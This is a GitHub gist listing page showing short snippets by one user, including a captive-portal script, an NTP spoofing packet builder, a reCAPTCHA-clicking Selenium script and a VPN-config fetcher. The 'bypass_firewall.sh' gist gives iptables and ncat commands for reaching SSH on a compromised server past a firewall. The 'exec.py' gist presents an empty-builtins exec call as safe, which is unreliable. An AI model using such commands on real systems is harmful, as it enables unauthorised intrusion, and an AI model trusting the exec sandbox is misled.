Skip to content

Instantly share code, notes, and snippets.

View tribela's full-sized avatar
😺
😼

Jeong Arm tribela

😺
😼
View GitHub Profile
@tribela
tribela / index.html
Last active August 29, 2015 14:19
Hex editor clock
<!DOCTYPE html>
<html>
<head>
<meta http-equiv="content-type" content="text/html; charset=utf-8" />
<meta name="viewport" content="width=device-width, initial-scale=1"/>
<link rel="stylesheet" href="style.css" type="text/css" media="all" charset="utf-8">
<script src="script.js" type="text/javascript"></script>
<title>Hex editor</title>
</head>
<body>
@tribela
tribela / 404
Last active March 7, 2019 08:20
Captive portal CGI
#!/bin/sh
cat << EOF
Status: 302 Temporary Redirect
Location: /cgi-bin/auth
Cache-Control: no-cache
<!doctype html>
<html>
<head>
@tribela
tribela / angel.js
Last active August 29, 2015 14:21
angel.js
var start = undefined;
var THRESHOLD = 6 * 1000;
var imgSrc = 'data:image/png;base64,/9j/4AAQSkZJRgABAQAAAQABAAD/2wBDAAgGBgcGBQgHBwcJCQgKDBQNDAsLDBkSEw8UHRofHh0aHBwgJC4nICIsIxwcKDcpLDAxNDQ0Hyc5PTgyPC4zNDL/2wBDAQkJCQwLDBgNDRgyIRwhMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjL/wAARCAJABAADASIAAhEBAxEB/8QAHwAAAQUBAQEBAQEAAAAAAAAAAAECAwQFBgcICQoL/8QAtRAAAgEDAwIEAwUFBAQAAAF9AQIDAAQRBRIhMUEGE1FhByJxFDKBkaEII0KxwRVS0fAkM2JyggkKFhcYGRolJicoKSo0NTY3ODk6Q0RFRkdISUpTVFVWV1hZWmNkZWZnaGlqc3R1dnd4eXqDhIWGh4iJipKTlJWWl5iZmqKjpKWmp6ipqrKztLW2t7i5usLDxMXGx8jJytLT1NXW19jZ2uHi4+Tl5ufo6erx8vP09fb3+Pn6/8QAHwEAAwEBAQEBAQEBAQAAAAAAAAECAwQFBgcICQoL/8QAtREAAgECBAQDBAcFBAQAAQJ3AAECAxEEBSExBhJBUQdhcRMiMoEIFEKRobHBCSMzUvAVYnLRChYkNOEl8RcYGRomJygpKjU2Nzg5OkNERUZHSElKU1RVVldYWVpjZGVmZ2hpanN0dXZ3eHl6goOEhYaHiImKkpOUlZaXmJmaoqOkpaanqKmqsrO0tba3uLm6wsPExcbHyMnK0tPU1dbX2Nna4uPk5ebn6Onq8vP09fb3+Pn6/9oADAMBAAIRAxEAPwD5/ooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigBdx6Z4oDHsTSUuadwHBierHFWIm
@tribela
tribela / bypass_firewall.sh
Last active August 29, 2015 14:27
open ssh connection into server that protected by external firewall only 80 port is opened
# Victim is a web server that is protected by external firewall. 80 port is opened and 22 (ssh) port is filtered.
# You cannot connect ssh into the server in this situation. But if you can run a single command (maybe web vulnerablity),
# You can get into the server.
victim $ iptables -t nat -A PREROUTING -p tcp --dport 80 --sport 31337 -j DNAT --to :22
attacker $ ncat -e "/bin/nc <victim> 80 -p 31337" -l 2222
attacker $ ssh -p 2222 localhost
# Or use iptables
@tribela
tribela / exec.py
Created August 17, 2015 02:52
exec code safely on python
import sys
from contextlib import closing
from StringIO import StringIO
def run(code):
with closing(StringIO()) as sout, closing(StringIO()) as serr:
sys.stdout = sout
sys.stderr = serr
exec code in {'__builtins__': {}}, {}
@tribela
tribela / facebook_autopoke.user.js
Created October 2, 2015 06:47
facebook autopoke
// ==UserScript==
// @name Facebook autopoke
// @namespace Kjwon15
// @description Facebook auto revenge poke
// @include http://*.facebook.com/pokes*
// @include https://*.facebook.com/pokes*
// ==/UserScript==
auto_poke=function(){
var poked=false;
@tribela
tribela / importer.py
Created February 3, 2016 06:36
Earth reader crawl old entries using archive.org
from __future__ import print_function
import datetime
import re
import sys
import requests
from libearth.repository import from_url
from libearth.session import Session
from libearth.stage import Stage
@tribela
tribela / ntpspoof.py
Created February 5, 2016 05:52
ntp spoofing
import datetime
import socket
import struct
packet_format = (
'!BBBB' # LI+VN+Mode, Stratum, Poll, Precision
'L' # Root delay
'L' # Root dispersion
'L' # Reference identifier
)
@tribela
tribela / captcha.py
Last active November 16, 2016 17:44
google recaptcha v2
import time
from selenium import webdriver
driver = webdriver.Firefox()
driver.get('https://www.google.com/recaptcha/api2/demo')
captcha_frame = driver.find_element_by_css_selector('iframe[src*="api2/anchor"]')
driver.switch_to_frame(captcha_frame)
driver.find_element_by_css_selector('.recaptcha-checkbox-checkmark').click()
@tribela
tribela / get_vpn.sh
Created April 6, 2016 14:23
get vpn
#!/bin/bash
vpn_lists=$(curl http://www.vpngate.net/api/iphone/ | awk -F',' '{if ($7 == "KR") print $1, $15}')
echo "${vpn_lists}" | while read line; do
hostname=${line%% *}
config=${line##* }
echo $config | base64 -di > ${hostname}.ovpn
done